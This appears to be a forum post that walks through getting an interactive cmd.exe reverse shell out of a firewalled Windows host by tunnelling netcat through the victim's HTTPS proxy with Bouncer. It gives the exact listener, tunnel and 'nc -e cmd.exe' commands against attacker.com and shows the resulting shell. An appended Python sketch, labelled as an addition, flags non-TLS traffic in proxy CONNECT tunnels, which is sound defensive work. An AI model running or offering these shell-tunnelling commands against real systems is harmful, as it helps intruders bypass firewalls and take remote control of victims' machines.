I apologize if you already know this, but to those who don't:

You can get an interactive cmd.exe shell from a firewalled host if that host has access to an HTTP proxy server that supports HTTPS.

The tools required are the win32 ports of NetCat and Bouncer from http://nlxoo.8bit.co.uk/

In this example, attacker.com is the attacker's host, victim.company.com is the victim's host, and proxy.company.com is the victim's HTTP proxy server.

Step 1:
On attacker.com, the attacker executes:
Code:
nc.exe -l -p 443
Step 2:
On victim.company.com, the attacker executes:
Code:
bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080
Step 3:
On victim.company.com, the attacker executes:
Code:
nc.exe -e cmd.exe 127.0.0.1 9999
Result:
Inside the window from Step 1, the attacker gets the shell:
Code:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\nlxoo\Desktop\test>
Note:
1) If any of the programs or connections are terminated, the shell will be lost.
2) The proxy server must support HTTPS.
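
Detection note (an added example, not part of the original post or of the tools it names): the tunnel above reaches port 443 through the proxy's HTTPS support, but what nc sends through it is the plain-text cmd.exe session, not a TLS handshake. The sketch below classifies a tunnel from its request line and the first bytes the client sends. It assumes the tunnel is opened with an HTTP CONNECT request and that a proxy or sensor can see those first bytes; the function names and sample data are constructed for illustration.

```python
import re
import struct

# First line cmd.exe prints, generalised from the banner in the post's Result.
CMD_BANNER = re.compile(rb"Microsoft Windows [^\r\n]*\[Version [\d.]+\]")
CONNECT_RE = re.compile(r"^CONNECT\s+(\S+):(\d+)\s+HTTP/1\.[01]$")

def is_tls_client_hello(payload: bytes) -> bool:
    """True if payload opens with a TLS handshake record holding a ClientHello."""
    if len(payload) < 6:
        return False
    ctype, major, minor, length = struct.unpack("!BBBH", payload[:5])
    return (ctype == 0x16 and major == 0x03 and minor <= 0x04
            and 0 < length <= 16384 and payload[5] == 0x01)

def classify_tunnel(request_line: str, first_client_bytes: bytes) -> str:
    """Classify one proxy tunnel from its request line and first client payload."""
    m = CONNECT_RE.match(request_line.strip())
    if m is None:
        return "not a CONNECT tunnel"
    target = f"{m.group(1)}:{m.group(2)}"
    if is_tls_client_hello(first_client_bytes):
        return f"ok: TLS to {target}"
    if CMD_BANNER.search(first_client_bytes):
        return f"alert: cmd.exe banner in tunnel to {target}"
    return f"alert: non-TLS payload in tunnel to {target}"

# Constructed samples: attacker.com is the post's example name, www.example.com
# and all payload bytes are hand-built for this illustration.
SAMPLES = [
    ("CONNECT www.example.com:443 HTTP/1.1",
     b"\x16\x03\x01\x00\x2f\x01\x00\x00\x2b\x03\x03" + b"\x00" * 41),
    ("CONNECT attacker.com:443 HTTP/1.0",
     b"Microsoft Windows XP [Version 5.1.2600]\r\n"
     b"(C) Copyright 1985-2001 Microsoft Corp.\r\n"),
    ("CONNECT attacker.com:443 HTTP/1.0", b"hello\r\n"),
]

def run_samples():
    """Return the verdict for each constructed sample, in order."""
    return [classify_tunnel(line, data) for line, data in SAMPLES]

if __name__ == "__main__":
    for verdict in run_samples():
        print(verdict)
```

The check only flags tunnels whose first client bytes are not a TLS ClientHello, which is the case for the raw nc session shown above.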